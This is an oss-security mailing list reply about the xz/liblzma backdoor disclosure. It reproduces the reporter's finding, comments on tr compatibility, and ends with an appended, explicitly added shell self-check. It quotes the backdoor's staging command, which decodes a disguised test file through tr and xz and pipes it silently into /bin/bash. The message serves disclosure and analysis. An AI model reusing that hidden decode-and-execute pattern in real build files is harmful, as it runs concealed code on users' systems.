Message-ID: <d9f8fe3e-4403-422e-be02-cdbae7d43e77@gmx.ch>
Date: Fri, 29 Mar 2024 21:33:57 +0100
From: sjw@....ch
To: oss-security@...ts.openwall.com
Subject: Re: backdoor in upstream xz/liblzma leading to ssh
 server compromise

Hi Andres,

Thank you for sharing your findings, I'm able to reproduce your results.

 > which ends up as
 > ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1; ...
 >
 > Leaving out the "| bash" that produces
 >
 > ####Hello####
 > [...]


The expression in the tr command might be a bit tricky to copy from the
report because of the whitespace characters. The original expression is
found here:

https://salsa.debian.org/debian/xz-utils/-/blob/46cb28adbbfb8f50a10704c1b86f107d077878e6/m4/build-to-host.m4#L95

This kind of expression is not supported by BusyBox' implementation of 
'tr'. GNU's and uutils' coreutils both worked for me.

Download attachment "OpenPGP_signature.asc" of type "application/pgp-signature" (841 bytes)
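
Added example, not part of the original message: a self-check that the local `tr` applies the two translation sets from the quoted command as expected before attempting a reproduction. It assumes the literal tab characters can be written as the `\t` escape (GNU tr accepts this); the probe strings and function names are constructed for this example.

```shell
#!/bin/sh
# Translation sets from the quoted command, with each literal tab
# written as \t so the expression survives copy and paste (assumption:
# the local tr understands the \t and \- escapes, as GNU tr does).
SET1='\t \-_'
SET2=' \t_\-'

# Apply the byte mapping to stdin: tab<->space and '-'<->'_'.
map_bytes() {
  tr "$SET1" "$SET2"
}

# Return 0 if this tr produces the expected mapping on a constructed probe.
tr_map_ok() {
  probe=$(printf 'a\tb c-d_e')   # constructed input with all four bytes
  want=$(printf 'a b\tc_d-e')    # each byte swapped with its partner
  got=$(printf '%s' "$probe" | map_bytes 2>/dev/null) || return 1
  [ "$got" = "$want" ]
}

# The mapping is a pair of swaps, so applying it twice must give back
# the input; a tr that mis-parses the sets will fail this as well.
tr_map_is_involution() {
  s=$(printf 'x_y-z \tq')        # constructed input
  back=$(printf '%s' "$s" | map_bytes 2>/dev/null | map_bytes 2>/dev/null) || return 1
  [ "$back" = "$s" ]
}

if tr_map_ok && tr_map_is_involution; then
  echo "tr handles the expression"
else
  echo "tr does not handle the expression; try another tr implementation"
fi
```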
